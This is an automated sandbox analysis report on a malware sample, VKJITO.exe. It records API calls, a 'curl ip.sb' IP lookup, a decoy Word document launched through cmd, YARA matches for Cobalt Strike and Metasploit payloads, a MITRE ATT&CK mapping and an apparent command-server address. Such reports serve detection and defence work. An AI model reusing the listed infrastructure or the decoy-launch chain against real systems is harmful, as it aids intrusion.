        Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435A9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D435A9C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D433E590 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7D433E590
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435A9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D435A9C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435AB64 SetUnhandledExceptionFilter,0_2_00007FF7D435AB64
        Source: C:\Users\user\Desktop\VKJITO.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sbJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docxJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""Jump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4342940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435A89C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7D435A89C
        Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

        Remote Access Functionality

        barindex
        Yara detected CobaltStrike
        Source: Yara matchFile source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Yara detected Metasploit Payload
        Source: Yara matchFile source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        Browser Extensions        		12
        Process Injection        		2
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory31
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection        		12
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA Secrets3
        System Information Discovery        		SSHKeylogging112
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Extra Window Memory Injection        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577651 Sample: VKJITO.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 92 27 templatesmetadata.office.net 2->27 29 ip.sb 2->29 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 5 other signatures 2->43 8 VKJITO.exe 7 2->8         started        signatures3 process4 dnsIp5 31 139.159.139.109, 49707, 8080 HWCSNETHuaweiCloudServicedatacenterCN China 8->31 11 WerFault.exe 19 16 8->11         started        14 curl.exe 1 8->14         started        17 cmd.exe 4 2 8->17         started        process6 dnsIp7 25 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->25 dropped 33 ip.sb 104.26.12.31, 49706, 80 CLOUDFLARENETUS United States 14->33 35 127.0.0.1 unknown unknown 14->35 19 conhost.exe 14->19         started        21 WINWORD.EXE 190 462 17->21         started        23 conhost.exe 17->23         started        file8 process9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.